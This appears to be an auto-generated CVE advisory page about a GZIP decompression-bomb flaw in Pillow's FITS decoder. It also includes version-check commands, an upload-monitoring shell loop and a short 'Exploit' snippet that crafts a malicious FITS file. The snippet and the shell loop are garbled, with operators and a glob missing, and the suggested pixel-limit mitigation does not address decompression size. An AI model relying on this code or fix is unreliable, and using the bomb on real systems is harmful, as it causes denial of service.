Pillow, Decompression Bomb, CVE-2026-40192 (Medium)

Listen to this Post

When decompressing GZIP data from a FITS image, Pillow did not limit the amount of data being read, meaning that it was vulnerable to GZIP decompression bombs. This vulnerability was introduced in Pillow 10.3.0.
The issue exists due to uncontrolled resource consumption in the FITS image decoder when parsing a specially crafted GZIP-compressed FITS file. A remote attacker can supply a specially crafted FITS file to cause a denial of service. The issue can result in unbounded memory consumption, leading to an out-of-memory crash or severe performance degradation.
The data being read is now limited to only the necessary amount in Pillow 12.2.0 (PR 9521).

DailyCVE Form:

Platform: Pillow (Python)
Version: 10.3.0-12.1.1
Vulnerability: Uncontrolled Resource Consumption
Severity: Medium
Date: Apr 10, 2026

Prediction: Apr 15, 2026

Analytics under What Undercode Say:

Check Pillow version
python -c "import PIL; print(PIL.<strong>version</strong>)"
Identify vulnerable versions
pip show Pillow | grep Version
Monitor for FITS file processing
inotifywait -m /path/to/fits/uploads -e create -e modify |
while read path action file; do
if [[ $file == .fits ]]; then
echo "Warning: FITS file detected at $(date)"
fi
done

Exploit:

import zlib
import gzip
Craft malicious FITS with highly compressed data
payload = b"X" 1000000
compressed = gzip.compress(payload) 100
Save as FITS file
with open("malicious.fits", "wb") as f:
f.write(compressed)

Protection from this CVE:

  • Update to Pillow 12.2.0 or later
  • Avoid opening untrusted FITS files
  • Implement resource limits: `PIL.Image.MAX_IMAGE_PIXELS = 128000000`

Impact:

  • Remote DoS via OOM crash
  • Severe performance degradation
  • Affects all applications using vulnerable Pillow versions for FITS processing

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top